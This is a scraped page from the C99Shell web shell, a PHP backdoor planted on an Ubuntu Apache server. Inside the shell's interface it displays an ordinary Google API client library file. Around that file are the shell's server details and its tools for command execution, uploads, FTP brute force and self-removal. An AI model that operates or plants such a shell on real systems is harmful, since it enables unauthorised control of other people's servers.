!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/google/apiclient-services/src/Google/Service/Docs/   drwxrwxrwx
Free 13.2 GB of 57.97 GB (22.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     EmbeddedObjectSuggestionState.php (5.38 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

class Google_Service_Docs_EmbeddedObjectSuggestionState extends Google_Model
{
  public 
$descriptionSuggested;
  protected 
$embeddedDrawingPropertiesSuggestionStateType 'Google_Service_Docs_EmbeddedDrawingPropertiesSuggestionState';
  protected 
$embeddedDrawingPropertiesSuggestionStateDataType '';
  protected 
$embeddedObjectBorderSuggestionStateType 'Google_Service_Docs_EmbeddedObjectBorderSuggestionState';
  protected 
$embeddedObjectBorderSuggestionStateDataType '';
  protected 
$imagePropertiesSuggestionStateType 'Google_Service_Docs_ImagePropertiesSuggestionState';
  protected 
$imagePropertiesSuggestionStateDataType '';
  protected 
$linkedContentReferenceSuggestionStateType 'Google_Service_Docs_LinkedContentReferenceSuggestionState';
  protected 
$linkedContentReferenceSuggestionStateDataType '';
  public 
$marginBottomSuggested;
  public 
$marginLeftSuggested;
  public 
$marginRightSuggested;
  public 
$marginTopSuggested;
  protected 
$sizeSuggestionStateType 'Google_Service_Docs_SizeSuggestionState';
  protected 
$sizeSuggestionStateDataType '';
  public 
$titleSuggested;

  public function 
setDescriptionSuggested($descriptionSuggested)
  {
    
$this->descriptionSuggested $descriptionSuggested;
  }
  public function 
getDescriptionSuggested()
  {
    return 
$this->descriptionSuggested;
  }
  
/**
   * @param Google_Service_Docs_EmbeddedDrawingPropertiesSuggestionState
   */
  
public function setEmbeddedDrawingPropertiesSuggestionState(Google_Service_Docs_EmbeddedDrawingPropertiesSuggestionState $embeddedDrawingPropertiesSuggestionState)
  {
    
$this->embeddedDrawingPropertiesSuggestionState $embeddedDrawingPropertiesSuggestionState;
  }
  
/**
   * @return Google_Service_Docs_EmbeddedDrawingPropertiesSuggestionState
   */
  
public function getEmbeddedDrawingPropertiesSuggestionState()
  {
    return 
$this->embeddedDrawingPropertiesSuggestionState;
  }
  
/**
   * @param Google_Service_Docs_EmbeddedObjectBorderSuggestionState
   */
  
public function setEmbeddedObjectBorderSuggestionState(Google_Service_Docs_EmbeddedObjectBorderSuggestionState $embeddedObjectBorderSuggestionState)
  {
    
$this->embeddedObjectBorderSuggestionState $embeddedObjectBorderSuggestionState;
  }
  
/**
   * @return Google_Service_Docs_EmbeddedObjectBorderSuggestionState
   */
  
public function getEmbeddedObjectBorderSuggestionState()
  {
    return 
$this->embeddedObjectBorderSuggestionState;
  }
  
/**
   * @param Google_Service_Docs_ImagePropertiesSuggestionState
   */
  
public function setImagePropertiesSuggestionState(Google_Service_Docs_ImagePropertiesSuggestionState $imagePropertiesSuggestionState)
  {
    
$this->imagePropertiesSuggestionState $imagePropertiesSuggestionState;
  }
  
/**
   * @return Google_Service_Docs_ImagePropertiesSuggestionState
   */
  
public function getImagePropertiesSuggestionState()
  {
    return 
$this->imagePropertiesSuggestionState;
  }
  
/**
   * @param Google_Service_Docs_LinkedContentReferenceSuggestionState
   */
  
public function setLinkedContentReferenceSuggestionState(Google_Service_Docs_LinkedContentReferenceSuggestionState $linkedContentReferenceSuggestionState)
  {
    
$this->linkedContentReferenceSuggestionState $linkedContentReferenceSuggestionState;
  }
  
/**
   * @return Google_Service_Docs_LinkedContentReferenceSuggestionState
   */
  
public function getLinkedContentReferenceSuggestionState()
  {
    return 
$this->linkedContentReferenceSuggestionState;
  }
  public function 
setMarginBottomSuggested($marginBottomSuggested)
  {
    
$this->marginBottomSuggested $marginBottomSuggested;
  }
  public function 
getMarginBottomSuggested()
  {
    return 
$this->marginBottomSuggested;
  }
  public function 
setMarginLeftSuggested($marginLeftSuggested)
  {
    
$this->marginLeftSuggested $marginLeftSuggested;
  }
  public function 
getMarginLeftSuggested()
  {
    return 
$this->marginLeftSuggested;
  }
  public function 
setMarginRightSuggested($marginRightSuggested)
  {
    
$this->marginRightSuggested $marginRightSuggested;
  }
  public function 
getMarginRightSuggested()
  {
    return 
$this->marginRightSuggested;
  }
  public function 
setMarginTopSuggested($marginTopSuggested)
  {
    
$this->marginTopSuggested $marginTopSuggested;
  }
  public function 
getMarginTopSuggested()
  {
    return 
$this->marginTopSuggested;
  }
  
/**
   * @param Google_Service_Docs_SizeSuggestionState
   */
  
public function setSizeSuggestionState(Google_Service_Docs_SizeSuggestionState $sizeSuggestionState)
  {
    
$this->sizeSuggestionState $sizeSuggestionState;
  }
  
/**
   * @return Google_Service_Docs_SizeSuggestionState
   */
  
public function getSizeSuggestionState()
  {
    return 
$this->sizeSuggestionState;
  }
  public function 
setTitleSuggested($titleSuggested)
  {
    
$this->titleSuggested $titleSuggested;
  }
  public function 
getTitleSuggested()
  {
    return 
$this->titleSuggested;
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0105 ]--